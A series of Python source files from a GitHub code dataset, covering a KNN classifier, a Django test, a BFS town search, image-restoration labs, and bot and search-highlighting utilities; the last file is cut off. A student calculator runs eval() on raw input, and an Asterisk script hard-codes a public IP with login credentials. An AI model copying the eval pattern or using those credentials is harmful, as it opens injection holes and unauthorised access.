num_upsampling_layers=self.opt.num_upsampling_layers)\n","repo_name":"snap-research/CAT","sub_path":"models/modules/inception_architecture/inception_spade_generator.py","file_name":"inception_spade_generator.py","file_ext":"py","file_size_in_byte":4492,"program_lang":"python","lang":"en","doc_type":"code","stars":172,"dataset":"github-code","pt":"37"} +{"seq_id":"20344188530","text":"#ex12.py\n#calculator\n#by Alexander Huber\n#exercises 12\n\ndef main():\n total = eval(input(\"how many calcualtions do you want to make? 
\"))\n for i in range(total):\n print(\"enter an expression to be calculated:\\t\") \n ans = eval(input()) \n print(ans)\n input(\"press any key to end the program\\n\")\nmain()","repo_name":"alexbyz/HW070172","sub_path":"l03/ex12.py","file_name":"ex12.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10260510862","text":"import pandas as pd\nimport re\n\n\ndef script2speech(script: str) -> pd.DataFrame:\n script = script.replace('\\t', '').replace('\\n'+15*' ','\\n')\n \n dataset = {\n 'character': [],\n 'speech': []\n }\n \n for match in re.finditer(r'(\\n +[A-Z (.)]+\\n)', script):\n cls = match.group(0)\n cls = cls.replace('\\n', '').replace(22*' ', '')\n \n speech_start_idx = match.end(0)\n speech_end_idx = script.find('\\n\\n', speech_start_idx)\n speech = script[speech_start_idx : speech_end_idx]\n speech = speech.replace('\\n', '').replace(10*' ', '')\n \n dataset['character'].append(cls)\n dataset['speech'].append(speech)\n \n return pd.DataFrame(dataset)\n \n","repo_name":"idg7/fmri_classifier","sub_path":"data/preprocess/script2speech.py","file_name":"script2speech.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26561109300","text":"import numpy as np\nfrom scipy.spatial import distance\n\n\nclass KNearestNeighbor(object):\n \"\"\"a KNN classifier with L2 distance\"\"\"\n\n def __init__(self):\n pass\n\n def train(self, X, y):\n \"\"\"\n Train the classifier. This is just memorizing all the training data.\n Inputs:\n - X: A numpy array of shape (num_train, D) containing the training data\n consisting of num_train samples each of dimension D.\n - y: A numpy array of shape (num_train,) containing the training labels, \n where y[i] is the label for X[i].\n \"\"\"\n self.X_train = X\n self.y_train = y\n\n def predict(self, X, k=1, cal_method=0):\n \"\"\"\n Test the classifier. 
\n Inputs:\n - X: A numpy array of shape (num_test, D) containing the test data\n consisting of num_test samples each of dimension D.\n - k: The number of nearest neighbors that vote for the predicted labels.\n - cal_method: method to calculate the distance between test X and train X\n Return:\n - pred_y: Predict output y\n \"\"\"\n # calculate the L2 distance between test X and train X\n if cal_method == 0:\n # no for-loop, vectorized\n dists = self.cal_dists_Eu(X)\n elif cal_method == 1:\n # one for-loop, half-vectorized\n dists = self.cal_dists_Man(X)\n elif cal_method == 2:\n # one for-loop, half-vectorized\n dists = self.cal_dists_Cosine(X)\n else:\n raise ValueError('Invalid value %d for num_loops' % cal_method)\n\n # predict the labels\n num_test = X.shape[0]\n y_pred = np.zeros(num_test)\n for i in range(num_test):\n # the closest k distance loc\n dists_k_min = np.argsort(dists[i])[:k]\n # the closest k distance ,all labels\n close_y = self.y_train[dists_k_min]\n # [0,3,1,3,3,1] -> 3 as y_pred[i]\n y_pred[i] = np.argmax(np.bincount(close_y))\n\n return y_pred\n\n def cal_dists_Eu(self, X):\n \"\"\"\n Calculate the distance with Euclidean Distance(欧式距离)\n Input:\n - X: A numpy array of shape (num_test, D) containing the test data\n consisting of num_test samples each of dimension D.\n Return:\n - dists: The distance between test X and train X\n \"\"\"\n num_test = X.shape[0]\n num_train = self.X_train.shape[0]\n dists = np.zeros((num_test, num_train))\n # (X - X_train)*(X - X_train) = -2X*X_train + X*X + X_train*X_train\n # shape (num_test, num_train)\n d1 = np.multiply(np.dot(X, self.X_train.T), -2)\n # shape (num_test, 1)\n d2 = np.sum(np.square(X), axis=1, keepdims=True)\n d3 = np.sum(np.square(self.X_train), axis=1) # shape (1, num_train)\n dists = np.sqrt(d1 + d2 + d3)\n\n return dists\n\n def cal_dists_Man(self, X):\n \"\"\"\n Calculate the distance with Manhattan Distance (曼哈顿距离)\n Input:\n - X: A numpy array of shape (num_test, D) containing the test data\n consisting of num_test samples each of dimension D.\n Return:\n - dists: The distance between test X and train X\n \"\"\"\n num_test = X.shape[0]\n num_train = self.X_train.shape[0]\n dists = np.zeros((num_test, num_train))\n for i in range(num_test):\n dists[i] = np.sum(np.abs(self.X_train - X[i]), axis=1)\n if(i % 100 == 0):\n print(\"Manhattan progress:\" ,i*100/num_test,\"%\")\n\n return dists\n\n def cal_dists_Cosine(self, X):\n \"\"\"\n Calculate the distance with Cosine Distance(余弦距离)\n Input:\n - X: A numpy array of shape (num_test, D) containing the test data\n consisting of num_test samples each of dimension D.\n Return:\n - dists: The distance between test X and train X\n \"\"\"\n num_test = X.shape[0]\n num_train = self.X_train.shape[0]\n dists = np.zeros((num_test, num_train))\n for i in range(num_test):\n for j in range(num_train):\n dists[i][j] = distance.cosine(X[i], self.X_train[j])\n if(i % 100 == 0):\n print(\"Cosine progress:\" ,i*100/num_test,\"%\")\n\n return dists\n","repo_name":"knockkk/2020_CV_class","sub_path":"1_KNN/code/test_cal_method/KNN_Classifier.py","file_name":"KNN_Classifier.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26612316083","text":"N = int(input())\nA = []\nB = []\n\nfor i in range(N):\n a, b = map(int, input().split())\n A.append(a)\n B.append(b)\n\nans = 0\n\nfor a, b in zip(A, B):\n n = b-a+1\n ans += 
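The per-row loop in cal_dists_Man and the double loop in cal_dists_Cosine above can be collapsed with scipy.spatial.distance.cdist, which returns the full (num_test, num_train) matrix in one vectorized call (an equivalent formulation, not the author's code):

import numpy as np
from scipy.spatial.distance import cdist

X_test = np.random.rand(5, 4)
X_train = np.random.rand(8, 4)

d_man = cdist(X_test, X_train, metric="cityblock")   # matches cal_dists_Man
d_cos = cdist(X_test, X_train, metric="cosine")      # matches cal_dists_Cosine
d_euc = cdist(X_test, X_train, metric="euclidean")   # same values as cal_dists_Eu

assert d_man.shape == (5, 8)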
(a+b)*n//2\nprint(ans)\n","repo_name":"mei28/Competitive-programing","sub_path":"ABC-181/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6307292395","text":"import datetime\nfrom unittest import mock\n\nfrom django.db import connections\nfrom django.db.models.sql.compiler import cursor_iter\nfrom django.test import TestCase\n\nfrom .models import Article\n\n\nclass QuerySetIteratorTests(TestCase):\n itersize_index_in_mock_args = 3\n\n @classmethod\n def setUpTestData(cls):\n Article.objects.create(name=\"Article 1\", created=datetime.datetime.now())\n Article.objects.create(name=\"Article 2\", created=datetime.datetime.now())\n\n def test_iterator_invalid_chunk_size(self):\n for size in (0, -1):\n with self.subTest(size=size):\n with self.assertRaisesMessage(\n ValueError, \"Chunk size must be strictly positive.\"\n ):\n Article.objects.iterator(chunk_size=size)\n\n def test_default_iterator_chunk_size(self):\n qs = Article.objects.iterator()\n with mock.patch(\n \"django.db.models.sql.compiler.cursor_iter\", side_effect=cursor_iter\n ) as cursor_iter_mock:\n next(qs)\n self.assertEqual(cursor_iter_mock.call_count, 1)\n mock_args, _mock_kwargs = cursor_iter_mock.call_args\n self.assertEqual(mock_args[self.itersize_index_in_mock_args], 2000)\n\n def test_iterator_chunk_size(self):\n batch_size = 3\n qs = Article.objects.iterator(chunk_size=batch_size)\n with mock.patch(\n \"django.db.models.sql.compiler.cursor_iter\", side_effect=cursor_iter\n ) as cursor_iter_mock:\n next(qs)\n self.assertEqual(cursor_iter_mock.call_count, 1)\n mock_args, _mock_kwargs = cursor_iter_mock.call_args\n self.assertEqual(mock_args[self.itersize_index_in_mock_args], batch_size)\n\n def test_no_chunked_reads(self):\n \"\"\"\n If the database backend doesn't support chunked reads, then the\n result of SQLCompiler.execute_sql() is a list.\n \"\"\"\n qs = Article.objects.all()\n compiler = qs.query.get_compiler(using=qs.db)\n features = connections[qs.db].features\n with mock.patch.object(features, \"can_use_chunked_reads\", False):\n result = compiler.execute_sql(chunked_fetch=True)\n self.assertIsInstance(result, list)\n","repo_name":"django/django","sub_path":"tests/queries/test_iterator.py","file_name":"test_iterator.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"16174863288","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 22 14:12:49 2022\r\n\r\n@author: CJ\r\n\"\"\"\r\nimport queue\r\nimport csv\r\nimport time\r\n \r\nclass city_US(object):\r\n def __init__(self, name, number, state):\r\n self.Name = name\r\n self.children = dict()\r\n self.Number = number\r\n self.State = state\r\n def add_child(self, name, cost):\r\n self.children[name] = cost\r\n\r\n# Not ranking here just using object\r\nclass priorityQueueObject(object):\r\n def __init__(self, name, pathcost):\r\n self.Number = name\r\n self.PathCost = pathcost\r\n \r\ndef readinTowns():\r\n cityDict = dict()\r\n # Create all entries of Dict with txt file with all city names\r\n # Dict keys will be a unique number identifier to avoid cities w/ same name in diff states\r\n with open(\"C:/Users/CJ/Documents/Grad_2022-23/ECE577/Project1/sf12010placename.txt\") as csv_file:\r\n csv_reader = csv.reader(csv_file, delimiter='\\t')\r\n line_count = 0\r\n for row in csv_reader:\r\n if line_count == 0:\r\n 
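readinTowns above builds a synthetic 7-digit key by multiplying the state FIPS code by 100000 and zero-padding the sum; a tuple key carries the same information without the arithmetic or the zfill (an alternative sketch, not the original design):

def make_key(state_fips: str, place_fips: str) -> tuple:
    # (state, place) tuples hash and compare correctly on their own.
    return (int(state_fips), int(place_fips))

assert make_key("25", "45000") == (25, 45000)
assert make_key("25", "45000") != make_key("9", "45000")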
line_count += 1\r\n else:\r\n StateNumber = int(row[0])*100000 + int(row[2])\r\n StateNumberStr = str(StateNumber).zfill(7)\r\n cityDict[StateNumberStr] = city_US(row[3], StateNumberStr, row[1])\r\n # Add adjacent towns within 25 mile radius of each town in dict \r\n with open(\"C:/Users/CJ/Documents/Grad_2022-23/ECE577/Project1/sf12010placedistance25miles.csv\") as csv_file:\r\n csv_reader = csv.reader(csv_file, delimiter=',')\r\n line_count = 0\r\n for row in csv_reader:\r\n if line_count == 0:\r\n line_count += 1\r\n else:\r\n StateNumber1 = int(row[0])*100000 + int(row[1])\r\n StateNumberStr1 = str(StateNumber1).zfill(7)\r\n StateNumber2 = int(row[3])*100000 + int(row[4])\r\n StateNumberStr2 = str(StateNumber2).zfill(7)\r\n cityDict[StateNumberStr1].add_child(StateNumberStr2, row[2]) \r\n return cityDict\r\n\r\n# https://stackoverflow.com/questions/41760856/most-simple-tree-data-structure-in-python-that-can-be-easily-traversed-in-both\r\nclass Tree(object):\r\n def __init__(self, data, pathcost, children=None, parent=None):\r\n self.data = data\r\n self.PathCost = pathcost\r\n self.children = children or []\r\n self.parent = parent\r\n\r\n def add_child(self, data, pathCost):\r\n new_child = Tree(data, pathCost, parent=self)\r\n self.children.append(new_child)\r\n return new_child\r\n \r\n def is_root(self):\r\n return self.parent is None\r\n\r\n def is_leaf(self):\r\n return not self.children\r\n\r\n def __str__(self):\r\n if self.is_leaf():\r\n return str(self.data)\r\n return '{data} [{children}]'.format(data=self.data, children=', '.join(map(str, self.children))) \r\n\r\ndef main():\r\n # cityGraph is our problem space - all \r\n cityGraph = readinTowns()\r\n frontier = queue.Queue()\r\n frontier_dict = dict()\r\n visited_dict = dict()\r\n file = open(\"BFS_NewEngland_Results.txt\", \"w\")\r\n writer = csv.writer(file)\r\n writer.writerow([\"ID Number\", \"City Name\", \"State\", \"Depth\", \"Excecution Time\", \"Cost\", \"Nodes Expanded\"])\r\n #Goals\r\n start = \"2545000\"\r\n Goal_cities = []\r\n for cities in cityGraph:\r\n if cityGraph[cities].State == \"Massachusetts\" or cityGraph[cities].State == \"Vermont\" or cityGraph[cities].State == \"Rhode Island\" or cityGraph[cities].State == \"Connecticut\" or cityGraph[cities].State == \"Maine\" or cityGraph[cities].State == \"New Hampshire\":\r\n if cityGraph[cities].Number != start:\r\n Goal_cities.append(cityGraph[cities].Number)\r\n\r\n for goal in Goal_cities:\r\n frontier = [priorityQueueObject(cityGraph[start].Number, 0)]; \r\n frontier_dict = dict()\r\n visited_dict = dict()\r\n st = time.time() \r\n # Initial update of current state \r\n current_state = frontier.pop(-1)\r\n frontier_dict[current_state.Number] = Tree(current_state.Number, 0)\r\n goal_reached_flag = 0\r\n no_route = 0\r\n # Goal Check - Loop until we reach goal\r\n while(1):\r\n # Explore on current level - kids is the city ID number [string]\r\n # Iterate through adjacent towns fro current state\r\n for kids in cityGraph[current_state.Number].children:\r\n # Check if the adjacent towns is in visited dict or frontier dict\r\n # Only add if not in visited or frontier\r\n if not(kids in visited_dict.keys()):\r\n if not(kids in frontier_dict.keys()):\r\n # Add children to current state frontier dict\r\n # Children are themselves a tree node\r\n pathCostToChild = current_state.PathCost + float(cityGraph[current_state.Number].children[kids])\r\n frontier_dict[kids] = frontier_dict[current_state.Number].add_child(kids, pathCostToChild)\r\n 
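The search loop above imports queue.Queue but actually drives the frontier as a plain list, where frontier.pop(0) costs O(n) per dequeue. collections.deque gives O(1) at both ends with the same usage pattern (sketch):

from collections import deque

frontier = deque()
frontier.append("2545000")     # enqueue: O(1)
current = frontier.popleft()   # dequeue: O(1), unlike list.pop(0)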
frontier.append(priorityQueueObject(kids,pathCostToChild ))\r\n if kids == goal:\r\n visited_dict[current_state.Number] = frontier_dict[current_state.Number]\r\n current_state = frontier.pop(0);\r\n goal_reached_flag = 1\r\n break\r\n # Add current state to visited - visited is the main tree we are creating \r\n visited_dict[current_state.Number] = frontier_dict[current_state.Number] \r\n \r\n if goal_reached_flag == 1:\r\n break\r\n \r\n # If no more items in our queue then we cannot reach goal\r\n if len(frontier) == 0:\r\n print(\"No possible route for \" + cityGraph[start].Name + \" to \" + cityGraph[goal].Name)\r\n no_route = 1;\r\n et = time.time()\r\n elapsed_time = et - st\r\n break;\r\n \r\n # Dequeue Current state and delete from fronteir dict \r\n del frontier_dict[current_state.Number]\r\n current_state = frontier.pop(0) \r\n \r\n # Bookeeping - don't add goal to visited in loop - do now for graph traversal\r\n et = time.time()\r\n if (current_state.Number == goal):\r\n no_route = 0;\r\n if not(no_route):\r\n visited_dict[goal] = frontier_dict[goal] \r\n # Print excecution time\r\n elapsed_time = et - st\r\n \r\n\r\n #print('Execution time:', elapsed_time, 'seconds')\r\n #print()\r\n \r\n # Use visited tree to find path found\r\n state = goal\r\n path_reverse_order = list()\r\n while state != start:\r\n path_reverse_order.append(cityGraph[state].Name + \", \" + (cityGraph[state].State))\r\n state = visited_dict[state].parent.data\r\n \r\n # Loop won't add start\r\n path_reverse_order.append(cityGraph[start].Name + \", \" + (cityGraph[start].State))\r\n # Reverse order as we started at goal\r\n path_reverse_order.reverse()\r\n # Print Route\r\n depth =len(path_reverse_order) - 1\r\n #print(\"Depth = \" + str(depth))\r\n finalPathCost = current_state.PathCost\r\n \r\n writer.writerow([cityGraph[goal].Number, cityGraph[goal].Name, cityGraph[goal].State, depth, elapsed_time, finalPathCost, len(visited_dict)])\r\n# for cities in path_reverse_order:\r\n# if cities == (cityGraph[goal].Name + \", \" + cityGraph[goal].State):\r\n# print(cities)\r\n# print(\" \")\r\n# print(\" \")\r\n# else:\r\n# print(cities + \" -> \", end='')\r\n \r\n \r\nif __name__ == \"__main__\":\r\n main()","repo_name":"serdim01/ECE577","sub_path":"Breadth_First_search_iterate_through_New_England.py","file_name":"Breadth_First_search_iterate_through_New_England.py","file_ext":"py","file_size_in_byte":7898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18473847572","text":"import socket\nfrom time import sleep\n\nami_cmd1 = '''Action: login\nEvents: off\nUsername: mark\nSecret: mysecret\\n\\n'''\n\nami_cmd2 = '''Action: Originate\nChannel: SIP/1001\nContext: outcoling\nExten: 1002\nPriority: 1\nCallerid: 1001\nTimeout: 30000\\n\\n'''\n\ndef ConnectToAsterisk(number=None):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n HOST = '51.140.244.177'\n PORT = 5038\n\n s.connect((HOST, PORT))\n s.send(bytes(ami_cmd1, 'utf-8'))\n sleep(0.1)\n data = s.recv(1024)\n\n calldata = ami_cmd2\n print(calldata)\n s.send(bytes(calldata, 'utf-8'))\n sleep(0.1)\n data = s.recv(1024)\n print(data)\n s.close()\n\nConnectToAsterisk(number=\"1002\")\n\n","repo_name":"denisrogovoy/methodist_modules","sub_path":"CallProject/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4292568384","text":"#!/usr/bin/env python\n# -*- coding:utf-8 
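The AMI client above sends a command, sleeps 100 ms, and hopes one recv(1024) catches the whole reply, which races the server. AMI frames every packet with a blank line, so reading until the \r\n\r\n terminator is the reliable framing (a sketch of the idea; the host, port, and credentials in the record are the example's own):

def recv_ami_block(sock) -> bytes:
    # Accumulate until the blank-line terminator that ends an AMI packet.
    data = b""
    while not data.endswith(b"\r\n\r\n"):
        chunk = sock.recv(1024)
        if not chunk:   # connection closed by the peer
            break
        data += chunk
    return data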
-*-\n# @FileName :lab6_3.py\n# @Time :2022-04-23 18:33\n# @Author :钟新宇\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\n\nfrom EE326_library.Base import plot\nfrom EE326_library.Degradations import motion_blur, full_inverse, limit_inverse, wiener\nfrom lab6.lab6_1 import lab6_1\n\n\ndef lab6_motion_blur(img, path, a, b, T, mode, radius=70, k2=100):\n h = motion_blur(img, a=a, b=b, T=T)\n if mode == \"full\":\n img_motion_blur_full = full_inverse(img, h=h)\n plot(img=img_motion_blur_full, title=\"img_motion_blur_full\",\n path=\"./img_result/\" + path + \"/img_motion_blur_full.png\")\n elif mode == \"limit\":\n img_motion_blur_limit = limit_inverse(img, h=h, radius=radius)\n plot(img=img_motion_blur_limit, title=\"img_motion_blur_limit\",\n path=\"./img_result/\" + path + \"/img_motion_blur_limit.png\")\n elif mode == \"wiener\":\n img_motion_blur_wiener = wiener(img, h=h, k2=k2)\n plot(img=img_motion_blur_wiener, title=\"img_motion_blur_wiener\",\n path=\"./img_result/\" + path + \"/img_motion_blur_wiener.png\")\n\n\ndef lab6_3_1():\n \"\"\"\n no noise\n :return:\n \"\"\"\n img = np.asarray(cv2.imread(\"./img_source/Q6_3_1.tiff\", cv2.IMREAD_GRAYSCALE), dtype=int)\n # img = plt.imread(\"./img_source/Q6_3_1.tiff\")\n img = np.array(img, dtype=int)\n # plt.figure()\n # plt.imshow(img, cmap='gray')\n # plt.show()\n lab6_motion_blur(img=img, path=\"lab6_3_1\", a=0.1, b=0.1, T=1, mode=\"full\")\n lab6_motion_blur(img=img, path=\"lab6_3_1\", a=0.1, b=0.1, T=1, mode=\"limit\", radius=40)\n lab6_motion_blur(img=img, path=\"lab6_3_1\", a=0.1, b=0.1, T=1, mode=\"wiener\", k2=100)\n\n\ndef lab6_3_2():\n \"\"\"\n uniform noise;\n :return:\n \"\"\"\n img = np.asarray(cv2.imread(\"./img_source/Q6_3_2.tiff\", cv2.IMREAD_GRAYSCALE), dtype=int)\n lab6_1(img, size=3, path=\"lab6_3_2\", q=1.5, noise_var=0.1, d=2, smax=7)\n\n\ndef lab6_3_3():\n \"\"\"\n pepper and salt noise;\n :return:\n \"\"\"\n img = np.asarray(cv2.imread(\"./img_source/Q6_3_3.tiff\", cv2.IMREAD_GRAYSCALE), dtype=int)\n lab6_1(img, size=5, path=\"lab6_3_3\", q=1.5, noise_var=0.25, d=2, smax=7)\n\n\nif __name__ == '__main__':\n try:\n # lab6_3_1()\n lab6_3_2()\n # lab6_3_3()\n\n except KeyboardInterrupt:\n pass\n","repo_name":"Linkin999/Digital_Image_Processing","sub_path":"reference/Better/SUSTech_EE326_2022S-main/SUSTech_EE326_Lab/lab6/lab6_3.py","file_name":"lab6_3.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42517067510","text":"from setuptools import setup, find_packages\nimport os\n\nVERSION = '0.1.4'\nLONG_DESCRIPTION = os.linesep.join([open('README.rst').read(),\n open('CHANGELOG.rst').read()])\n\nsetup(\n name='pergenie',\n version=VERSION,\n\n author='Kensuke Numakura',\n author_email='knmkr3gma+pip@gmail.com',\n\n description='perGENIE is a Web/CUI application for personal genome interpretation.',\n long_description=LONG_DESCRIPTION,\n url='https://github.com/perGENIE/pergenie-cli',\n classifiers=[\n \"Development Status :: 2 - Pre-Alpha\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Education\",\n \"Intended Audience :: End Users/Desktop\",\n \"Intended Audience :: Healthcare Industry\",\n \"Intended Audience :: Information Technology\",\n \"Intended Audience :: Science/Research\",\n \"Natural Language :: English\",\n \"Natural Language :: Japanese\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Unix\",\n \"Programming Language :: Python 
:: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 2 :: Only\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\",\n ],\n keywords=['bioinformatics', 'personal genome'],\n license='GNU AGPLv3',\n\n packages=find_packages(),\n package_data={'pergenie': ['example/*',\n 'data/*',\n 'test/test_*',\n 'test/testcase_*/*']},\n entry_points={'console_scripts': ['pergenie = pergenie:main']},\n test_suite='test.test_all'\n)\n","repo_name":"perGENIE/pergenie-cli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17480678146","text":"class Tools:\n\n @staticmethod\n def create_link_to_emp(emp):\n '''\n Создание ссылки на юзера\n '''\n emp_url = f'tg://user?id={emp.id}'\n emp_html = f\"
{emp.fio}\"\n return emp_html\n\n @staticmethod\n def form_list_participants(participants, index=0):\n '''\n Формирование текстового спика поздравляющих или его части(если длина слишком большая)\n '''\n text = \"\"\n for i in range(index, len(participants)):\n if len(text) >= 3500:\n return (text, i)\n text += f\"{i + 1}. {Tools.create_link_to_emp(participants[i].employee)}\\n\"\n\n return (text, None)\n\n @staticmethod\n def form_list_wishes(wishes, index=0):\n '''\n Формирование текстового спика желаний или его части(если длина слишком большая)\n '''\n text = \"\"\n for i in range(index, len(wishes)):\n if len(text) >= 3500:\n return (text, i)\n text += f\"{i + 1}. {wishes[i].text}\\n\"\n\n return (text, None)\n","repo_name":"anatoliyYDev/dr-tg-bot","sub_path":"utils/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16509937685","text":"from collections import namedtuple\nimport os\n\nMetadata = namedtuple(\"Metadata\", [\"title\", \"lang\", \"authors\", \"description\", \"link\"])\n\n_File = namedtuple(\"File\", [\"url\", \"name\"])\n\n\nclass File(_File):\n def __str__(self):\n return self.name\n\n\nPATH = os.getenv(\n \"PIE_EXTENDED_DOWNLOADS\",\n os.path.normpath(\n os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n \"..\",\n \"downloads\"\n )\n )\n)\n\n\ndef get_path(module, file):\n return os.path.join(PATH, module, file)\n\n\nclass ObjectCreator:\n \"\"\" Some objects should be reset everytime a new tagging is done. To make this easier\n we provide this class that keeps in memory the initialization parameters.\"\"\"\n def __init__(self, cls, *args, **kwargs):\n self.cls = cls\n self.args = args\n self.kwargs = kwargs\n\n def create(self):\n return self.cls(*self.args, **self.kwargs)\n\n\ndef roman_number(inp: str) -> int:\n \"\"\"\n Source: https://stackoverflow.com/questions/19308177/converting-roman-numerals-to-integers-in-python\n Author: https://stackoverflow.com/users/1201737/r366y\n :param num:\n :return:\n\n >>> roman_number(\"XXIV\")\n 24\n \"\"\"\n roman_numerals = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\n result = 0\n for i, c in enumerate(inp.upper()):\n if (i+1) == len(inp) or roman_numerals[c] >= roman_numerals[inp[i+1]]:\n result += roman_numerals[c]\n else:\n result -= roman_numerals[c]\n return result\n","repo_name":"hipster-philology/nlp-pie-taggers","sub_path":"pie_extended/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"17772050789","text":"from itertools import permutations\n\ndef solve():\n n1 = 100\n n2 = 100\n candidate = n1 * n2\n for i in range(899):\n n2 = 100\n for j in range(899):\n ans = n1 * n2\n\n if str(ans) == str(ans)[::-1] and ans > candidate:\n candidate = ans\n\n n2 += 1\n n1 += 1\n print(candidate)\n\nif __name__ == '__main__':\n solve()","repo_name":"matus-jan-lavko/mj-vs-projecteuler","sub_path":"004.py","file_name":"004.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23890157131","text":"from manager import Manager\n\nclass Menu:\n def __init__ (self):\n self.manager = Manager()\n self.choices = {\n \"1\" : self.manager.create_order,\n \"2\" : self.manager.see_order, \n \"3\" : self.manager.delete_order, #works\n \"4\" : 
self.manager.update_order,\n \"5\" : self.manager.save\n }\n##main menu for the pizza store\n def display_menu (self):\n print(\"Welcome to DHMS Pizza!! \")\n print(\"................\")\n\n print(\"\"\" What would you like today??\n 1. Order Pizza\n 2. See All Order\n 3. Cancel My Order \n 4. Update My Order\n 5. Save File\"\"\")\n\n def run(self):\n while True:\n self.display_menu()\n selection = input(\"Enter an option: \" ) \n action = self.choices.get(selection)\n if action:\n action()\n else:\n print(\"{0} is not a valid choice\".format(selection)) \n\n","repo_name":"hrGuTou/DHMS-Custom-Pizza","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17492344522","text":"from __future__ import division\nfrom heapq import nlargest\nfrom cgi import escape as htmlescape\n\n# Fragment object\n\nclass Fragment(object):\n \"\"\"Represents a fragment (extract) from a hit document. This object is\n mainly used to keep track of the start and end points of the fragment; it\n does not contain the text of the fragment or do much else.\n \"\"\"\n \n def __init__(self, tokens, charsbefore=0, charsafter=0, textlen=999999):\n \"\"\"\n :param tokens: list of the Token objects in the fragment. \n :param charsbefore: approx. how many characters before the start of the\n first matched term to include in the fragment.\n :param charsafter: approx. how many characters after the end of the\n last matched term to include in the fragment.\n :param textlen: length in characters of the document text.\n \"\"\"\n \n #: index of the first character of the fragment in the original\n # document\n self.startchar = max(0, tokens[0].startchar - charsbefore)\n #: index after the last character of the fragment in the original\n #document\n self.endchar = min(textlen, tokens[-1].endchar + charsafter)\n self.matches = [t for t in tokens if t.matched]\n self.matched_terms = frozenset(t.text for t in self.matches)\n \n def __len__(self):\n return self.endchar - self.startchar\n \n def overlaps(self, fragment):\n sc = self.startchar\n ec = self.endchar\n fsc = fragment.startchar\n fec = fragment.endchar\n return (fsc > sc and fsc < ec) or (fec > sc and fec < ec)\n \n def overlapped_length(self, fragment):\n sc = self.startchar\n ec = self.endchar\n fsc = fragment.startchar\n fec = fragment.endchar\n return max(ec, fec) - min(sc, fsc)\n \n def has_matches(self):\n return any(t.matched for t in self.tokens)\n \n\n# Filters\n\ndef copyandmatchfilter(termset, tokens):\n for t in tokens:\n t = t.copy()\n t.matched = t.text in termset\n yield t\n\n\n# Fragmenters\n\ndef NullFragmenter(text, tokens):\n \"\"\"Doesn't fragment the token stream. This object just returns the entire\n stream as one \"fragment\". This is useful if you want to highlight the\n entire text.\n \"\"\"\n \n tokens = list(tokens)\n before = after = 0\n if tokens:\n before = tokens[0].startchar\n after = len(text) - tokens[-1].endchar\n return [Fragment(tokens, charsbefore=before, charsafter=after)]\n\n\nclass SimpleFragmenter(object):\n \"\"\"Simply splits the text into roughly equal sized chunks.\n \"\"\"\n \n def __init__(self, size=70):\n \"\"\"\n :param size: size (in characters) to chunk to. 
The chunking is based on\n tokens, so the fragments will usually be smaller.\n \"\"\"\n self.size = size\n \n def __call__(self, text, tokens):\n size = self.size\n first = None\n frag = []\n \n for t in tokens:\n if first is None:\n first = t.startchar\n \n if t.endchar - first > size:\n first = None\n if frag:\n yield Fragment(frag)\n frag = []\n \n frag.append(t)\n \n if frag:\n yield Fragment(frag)\n\n\nclass SentenceFragmenter(object):\n \"\"\"Breaks the text up on sentence end punctuation characters\n (\".\", \"!\", or \"?\"). This object works by looking in the original text for a\n sentence end as the next character after each token's 'endchar'.\n \n When highlighting with this fragmenter, you should use an analyzer that\n does NOT remove stop words, for example::\n \n sa = StandardAnalyzer(stoplist=None)\n \"\"\"\n \n def __init__(self, maxchars=200, sentencechars=\".!?\"):\n \"\"\"\n :param maxchars: The maximum number of characters allowed in a fragment.\n \"\"\"\n \n self.maxchars = maxchars\n self.sentencechars = frozenset(sentencechars)\n \n def __call__(self, text, tokens):\n maxchars = self.maxchars\n sentencechars = self.sentencechars\n textlen = len(text)\n first = None\n frag = []\n \n for t in tokens:\n if first is None:\n first = t.startchar\n endchar = t.endchar\n \n if endchar - first > maxchars:\n first = None\n if frag:\n yield Fragment(frag)\n frag = []\n \n frag.append(t)\n if frag and endchar < textlen and text[endchar] in sentencechars:\n # Don't break for two periods in a row (e.g. ignore \"...\")\n if endchar + 